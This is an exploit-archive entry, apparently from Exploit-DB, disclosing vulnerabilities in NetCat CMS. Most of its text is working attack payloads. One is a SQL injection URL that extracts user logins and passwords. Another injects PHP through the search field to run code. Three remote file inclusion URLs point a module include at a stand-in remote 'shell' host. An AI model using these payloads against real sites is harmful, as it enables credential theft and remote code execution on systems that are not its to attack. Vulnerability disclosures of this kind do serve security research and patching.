[] NeoSense

NetCat CMS - Multiple Vulnerabilities

Author: brain[pillow]
type: webapps
platform: php
port: 
date_added: 2011-09-12 
date_updated: 2011-09-12 
verified: 0 
codes: OSVDB-75455 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: NetCat CMS Code exec, SQL-injection
# Google Dork: none
# Date: 28.11.2010
# Author: brain[pillow]
# Software Link: http://netcat.ru/
# Version: UNKNOWN

On different versions of this software next vulnerabilities are availible:

=======================================================
# Sql-injection:

/search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23

=======================================================
# Code exec:

/search/?action=index&text={${phpinfo()}}

# Remote File Inclusion:
=================================
# Vuln code example:
=================================

<?php
/* $Id: function.inc.php 3272 2009-05-25 14:34:42Z vadim $ */

// get global value (for admin mode)
global $MODULE_FOLDER;

// include need classes
include_once ($MODULE_FOLDER."filemanager/nc_filemanager.class.php");

?>

================================
# Three exploits:
================================

/netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?